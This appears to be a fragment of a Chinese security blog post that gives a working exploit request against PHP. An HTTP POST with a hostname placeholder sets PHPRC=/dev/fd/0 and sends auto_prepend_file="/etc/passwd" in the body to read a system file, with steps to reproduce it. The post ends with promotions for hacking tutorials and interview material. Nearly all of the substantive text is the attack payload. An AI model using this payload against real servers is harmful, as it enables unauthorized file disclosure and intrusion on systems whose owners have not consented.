

原始包如下:

payload如下:
POST /?PHPRC=/dev/fd/0 HTTP/1.1Host: {{Hostname}}Content-Type: application/x-www-form-urlencodedauto_prepend_file="/etc/passwd"修改传参方式,并按照上述payload在路径后面拼接上”?PHPRC=/dev/fd/0”,请求体中加入auto_prepend_file参数。结果如下:

![]()
没看够~?欢迎关注!


技术文档、书籍


面试题
帮助你在面试中脱颖而出

视频
基础到进阶
环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

